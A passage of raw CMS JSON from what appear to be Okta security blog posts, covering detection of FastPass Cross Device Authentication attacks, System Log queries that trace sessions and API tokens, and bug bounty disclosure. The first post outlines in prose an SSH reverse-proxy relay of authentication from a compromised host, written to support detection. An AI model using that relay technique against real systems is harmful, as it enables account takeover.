Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevention\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Steve Lind recently published a great blog, ‘\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2025/04/stay-secure-with-fastpass-and-trusted-app-filters/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stay secure with FastPass and Trusted App Filters\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"’, which details what \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/trusted-app-filters-for-fastpass.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trusted App Filters\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" are and how they can be used to protect against Cross Device Authentication (CDA) attacks, so be sure to check it out.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this blog post, I would like to provide some potential detection ideas off the back of Trusted App Filters. When you authenticate with FastPass using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"LOOPBACK\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"APPLE_SSO_EXTENSION\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" binding methods (i.e. 
the phishing-resistant methods), you will find in the associated user.authentication.auth_via_mfa event, under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"‘AuthenticatorContext’\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" object, a variety of information about the process that initiated the authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5nOYAureGL8o2VgpyUZNiZ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These values are particularly useful from a detection perspective, as they give you visibility into what process the authentication request was initiated from, and can be used to detect unexpected or anomalous processes initiating authentication in your environment. Our Identity Defence Operations team have put together an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/customer-detections/blob/master/detections/fastpass_auth_via_suspicious_binary.yml\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"example query\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that you can use to identify authentication requests that are not initiated by a browser using System Log.  
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Leveraging \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/xpn/OktaPostExToolkit/tree/master/oktarealfast\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adam Chester’s\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" lightweight proxy on our attacker machine and an SSH reverse proxy on the compromised machine, when we authenticate to an Okta protected resource from the attackers machine, the authentication request is forwarded over the reverse proxy to FastPass on the compromised machine. Looking in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"‘AuthenticatorContext’ \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"object we can see that the initiating process is SSH.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"22PJ0fQyvgLoiHxlErinkx\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Another potential avenue for detecting Cross Device Authentication (CDA) attacks is via anomalies in the session establishment. During the authentication flow a user.session.start event and a user.authentication.auth_via_mfa event are generated. Leveraging the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/rootsessionidroottokenid/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"root_session_id\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we can tie these events together. Next we can extract the client IPs from each event, looking for when they don't match. 
In an attack scenario, the IP in the user.session.start event will be the attacker’s and the IP in the\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"user.authentication.auth_via_mfa event will be the compromised device. We can then layer techniques like impossible travel, conflicting ASNs or changes in User Agents to identify suspicious events. At times (depending on your environment) these methods can be prone to false positives, so combining this with an anomalous calling process can help filter out the noise and turn this into a robust detection opportunity. Note that the IP comparison only fires when the attacker’s session and the forwarded FastPass authentication reach Okta from different addresses; an attacker who also routes their browser traffic through the compromised host would present matching IPs, which is a further reason to pair this check with the process-based signal rather than rely on it alone. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"62whkyYfYxMvF1CSQdAmSF\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Closing comments\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To find out more, I highly recommend checking out Steve Lind’s recent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2025/04/stay-secure-with-fastpass-and-trusted-app-filters/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"blog\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which covers Trusted Application Filters more in-depth. 
If you can’t get enough after that, check out our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane/2024/sessions/back-to-the-future-the-re-emergence-of-device-based-attacks/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane on Demand 2024 session\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", where Steve and I include a demo on how Trusted App Filters can thwart Cross Device Authentication (CDA) attacks.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Trusted App Filters accounts for Identity-based attacks arising from compromised hardware. This blog article provides insights and resources on preventing and detecting Cross Device Authentication (CDA) authentication attacks."},"updatedAt":"2025-04-17T22:06:11.690Z","secAuthor":[{"id":"21ae8763-5bd4-5d85-9ae3-0f53eb81433d","bio":{"bio":"<p>Zach Newton is the Senior Manager of the Global Adversarial Engineering and Operations team at Okta, who are focused on adversary simulation and offensive-driven detection research. Prior to joining Okta, Zach worked in a variety of offensive and defensive roles across financial services, telecommunications and retail. 
</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/wNSXK3ik5gdGgY2gFU1Yv/ad8668990c94990af8e82dd16018b58b/Zach_Newton_Headshot.jpg"},"name":"Zach Newton","jobTitle":"Senior Manager, Adversarial Engineering & Operations","slug":"/hackers/zach-newton","node_locale":"en"}]},{"slug":"/rootsessionidroottokenid","id":"0f833488-0720-5751-b494-4e951457b99f","title":"One trick finds the root of any Okta troubles","date":"2025-03-03T06:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Whether you’re troubleshooting a technical issue or performing a forensic investigation in your \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/workforce-identity/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Workforce Identity\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" org, this article introduces a couple of new queries that can quickly get you to the root of the problem. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"They arise from the addition of two new key/value pairs in a large number of \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://developer.okta.com/docs/api/openapi/okta-management/management/tag/SystemLog/#tag/SystemLog\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta System Log\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" events, designed to help administrators, auditors and incident responders get their job done faster.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"These helpful tricks are brought to you by the letters O, S, I and C. 
If you haven’t heard, this acronym stands for The \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/au/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Secure Identity Commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", which is Okta’s long-term initiative to lead the industry in the fight against Identity attacks.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"All events using an API token\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The first object to take note of is the RootApiTokenId. A RootApiTokenId will first appear as the target.id when you create an API token, irrespective of whether it’s a management API token or an OAuth token in Okta:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"eventType eq \\\"system.api_token.create\\\" and target.id eq \\\"[RootApiTokenId]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"From that point on, the same RootApiTokenId will be stamped in the transaction.detail.rootApiTokenId value of every logged event that arises from the use of that API token.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If that token were ever compromised, or causing you some other manner of trouble, you’re able to find all logged API actions performed using that token using a single query:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"transaction.detail.rootApiTokenId eq \\\"[insert RootApiTokenId 
value]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{\"target\":{\"sys\":{\"id\":\"7xnhvFwAwMDrxF28Fv8TbF\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[],\"nodeType\":\"embedded-asset-block\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\\n\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"One thing to note, however: Okta management API tokens, sometimes referred to as static or \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/create-an-api-token/main/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"SSWS Tokens\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", are often long-lived. They expire if an administrator revokes or rotates them or they aren’t used for 30 days. A token created more than 90 days ago is outside the retention period of Okta System log events, in which case you’ll only find the token \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"creation\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" event if you have been streaming these events to your SIEM and archiving them there. 
You can otherwise find all active tokens listed in the Okta Admin Console under \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Security > API > Tokens.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We recommend eschewing static tokens for \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/apiservice/api-service-integrations.htm\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"OAuth2.0 tokens\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" in production applications, given the latter are \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://developer.okta.com/blog/2023/04/24/api-integrations\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"short-lived\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", sender-constrained, and can operate independently of the account used to create them. 
If for any reason OAuth 2.0 is infeasible, static tokens should be created using a dedicated \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Custom Admin Role\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" that is only granted the minimum permissions required for the integration to function, and use of the token should be allowlisted to a specific IP or IP range where Okta should expect API calls for this app to originate from.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"All events during a user session\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The second object of interest is the RootSessionId. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Much the same logic applies as with our method of tracking the use of an API token, only now we’re applying the same method to an interactive user session. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The RootSessionId will first appear as the authenticationContext.rootSessionId value when an interactive user successfully validates their identity at primary authentication:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"eventType eq \\\"user.session.start\\\" and authenticationContext.rootSessionId eq \\\"[RootSessionId]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"From that point on, the same RootSessionId will be stamped in the authenticationContext.rootSessionId value of every logged event during the user’s interactive session.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If you ever have cause to suspect that session was compromised, you’re able to find all user actions performed using that token using a single query:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"authenticationContext.rootSessionId eq \\\"[insert RootSessionId value]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{\"target\":{\"sys\":{\"id\":\"4o3JJCwiQDXh4tK3E69HFA\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[],\"nodeType\":\"embedded-asset-block\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Wait, this sounds familiar\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"So what’s the difference between the externalSessionID and the RootSessionId?  It sort of sounds like they do the same thing, right? 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Well, almost the same thing. The distinction is that some user actions result in creation of a new externalSessionId. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If a user performs some form of factor lifecycle event, for example, they will be challenged to verify their identity using an existing pre-enrolled factor. Once they successfully perform this action, they have effectively commenced a new session. That makes logical sense, but when you’re troubleshooting or in response mode and want to see the bigger picture, searching with only the externalSessionId can result in missed events. The RootSessionId value, by contrast, is added to every user action up until the session expires or the user signs out.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The only exceptions to that rule are system generated events (that is, actions taken by the Okta platform in response to user generated events, but not initiated by a user), or events sourced in or triggered by Okta Workflows, Okta Privileged Access, and Okta Access Requests, which have their own unique identifiers.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To catch any potential edge cases, we suggest that any analysis of session activity also includes a sweep of actions by the IP address or actor in question. 
The following query can be used to identify any actions that correspond to given criteria, but without a rootSessionId value.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"not(authenticationContext.rootSessionId pr) AND <your logic>\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To find all events related to a particular user that didn’t have a rootSessionId value: \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"not(authenticationContext.rootSessionId pr) and actor.alternateId eq \\\"[username value]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To find all actions related to a particular IP that didn’t have a rootSessionId value (the System Log attribute is client.ipAddress, lower-case ‘i’):\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"not(authenticationContext.rootSessionId pr) and client.ipAddress eq \\\"[IP address value]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To find all actions where the user was the subject (aka target) of an event:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"not(authenticationContext.rootSessionId pr) and target.alternateId eq \\\"[username value]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Beyond the SOC \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The ability to query for all events related to an API token or all events related to a user session also opens up a lot 
of possibilities for automation. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We recommend revisiting your detection library and your Okta Workflows with these queries in mind: they will help to find some creative solutions to all sorts of problems.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Use these two System Log queries to see every event during a given user session, or every event that used a given API token."},"updatedAt":"2025-04-17T15:26:36.135Z","secAuthor":[{"id":"bc35d36e-0acc-5cdf-b3b0-82936842a105","bio":{"bio":"<p>Dan is a Group Product Manager, responsible for Okta's product data platform. Dan has spent the last 14 years in the enterprise software space in roles across both go-to-market and product management. He holds a bachelor's degree in electrical engineering from Case Western Reserve University. </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5wVwNMsIlx1wQjZnfiMWfE/f2c80703330283505d57fb4e3ae8109d/dand.png"},"name":"Dan Dennhardt","jobTitle":"Group Product Manageer","slug":"/hackers/dan-dennhardt","node_locale":"en"},{"id":"ce5c6303-da17-5bcb-8917-7592d3c88ac7","bio":{"bio":"<p> Vadim has 15+ years of experience in web application development, with expertise in identity management and access control frameworks, application security, secure software development, and cryptography. 
Outside of work, Vadim enjoys biking, hiking, playing the guitar, reading, and solving mathematical puzzles.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6WhyV4HRXrSvjK0ReOlrtt/652205e0620e9613548bdc7df33c2068/vadims.jpeg"},"name":"Vadim Spector","jobTitle":"Principal Software Engineer","slug":"/hackers/vadim-spector","node_locale":"en"},{"id":"b006f4e2-a177-55cd-a2ee-ff041e6ece35","bio":{"bio":"<p>John leads the EMEA node of Okta's Detection and Response Engineering team.</p>\n\n<p>His team develops detections and supplementary automations to protect Okta from threat actors, which in turn inform our rotational response and threat hunting missions.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3156PfzPum7cu577jTvWv5/fda95a934e6567e0d6f41e6ce1da8c56/johnmurphy.jpg"},"name":"John Murphy","jobTitle":"Manager, Defensive Cyber Operations (EMEA)","slug":"john-murphy","node_locale":"en"},{"id":"8f5a8df8-9538-59df-b948-3cf6f2d2168d","bio":{"bio":"<p>Dinko Bajric is a Software Architech on Okta's Engineering team. Over the past 15 years, Dinko has had experience in diverse areas, including backend engineering, UI/UX, security, telemetry and analytics, performance and reliability, and management. His broad range of expertise helps him approach challenges from different perspectives, aiming to deliver reliable and efficient outcomes. Outside of work, Dinko enjoys tinkering with home automation hardware and software, but when he wants a break from technology, he builds furniture. 
</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/hmcQwZra3FSYIEp1DQtJ7/7c196e254f942f623c262892b53a4e6f/Dinko.jpg"},"name":"Dinko Bajric","jobTitle":"Software Architect","slug":"/hackers/dinko-bajric","node_locale":"en"}]},{"slug":"/articles/2024/04/how-responsible-disclosures-are-shaping-a-safer-cyberspace","id":"6cecc7f1-1fd7-5699-8288-e2528705e331","title":"How Responsible Disclosures are Shaping a Safer Cyberspace","date":"2025-04-09T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A staggering 40,003 total CVEs were \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvd.nist.gov/vuln/search\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recorded\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by the National Vulnerability Database (NVD) in 2024. Technology advancements and the rate at which features are continually released undoubtedly contribute to these rising numbers, which represent a 39% increase from 2023. Prioritizing security from the start by employing secure coding and development practices is key to mitigating vulnerabilities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The cybersecurity risk landscape continues to evolve rapidly with the rise of threat actor sophistication and tooling. 
In 2024, attacks involving the exploitation of web application vulnerabilities increased significantly — by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/dbir/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"180%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" — nearly triple that of the previous year.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits of ethical hacking\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What was once considered a controversial topic has gained widespread appeal as a crucial practice in the ongoing fight against threat actors and vulnerability exploitation. Ethical hackers and security researchers are revolutionizing today’s vulnerability management programs and reducing online risks by participating in Bug Bounty programs and disclosing vulnerabilities responsibly.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta supports and actively participates in responsible disclosure practices including a Bug Bounty program, which contributes to a safer online community by reducing the number of active vulnerabilities that could be exploited by threat actors with malicious intent. 
Industry benefits of responsible disclosures continue to grow for software vendors and technology users alike.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Industry inclusivity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Traditional approaches to cybersecurity predate modern-day responsible disclosures and other notable programs such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.bugcrowd.com/bug-bounty-list/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"BugCrowd\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://googleprojectzero.blogspot.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Project Zero\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Organizations can now leverage the skillset of the hacker community to improve their security posture. Ethical hackers are provided an environment to learn, test, and responsibly disclose security issues to technology vendors.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Improved security\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The more testing, the better. Ethical hackers who attempt to discover software vulnerabilities with the intention of closing security gaps improve security posture. However, a Bug Bounty program should not replace a full-time security team; dedicated, internal talent, including Offensive Security or Product Security, is highly advisable. 
Ethical hacking programs should complement a comprehensively robust security program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cost savings\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bug Bounty programs offer organizations additional security safeguards while awarding monetary rewards to ethical hackers for successfully discovering and reporting bugs or vulnerabilities to the software vendor. The cost of an exploited vulnerability resulting in a data breach will far outweigh any Bug Bounty reward.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Transparency\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust starts with transparency: technology vendors are granted opportunities to be transparent with their customers, given the identification of vulnerabilities. Responsible disclosure programs aim to socialize ethical hacking practices further and improve vendor transparency by avoiding silent patching. Organizations are subject to NVD standards when remediating and communicating vulnerability-related information to customers and users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and BugCrowd\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is proud to offer Bug Bounty programs through BugCrowd which create direct connections to the global security researcher community. 
Okta welcomes submissions and believes that community participation plays an integral role in protecting our clients’ systems and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On any given day, thousands of lines of code are written, and hundreds of thousands are released into production for the Okta and Auth0 platforms. These programs are a supplementary security practice to our standard \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Development Lifecycle\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (SDL) methodologies which include in-depth reviews at various stages of development.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2sW9AK8hIViLNpOnHf7a9K\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We invite you to review Okta’s defined 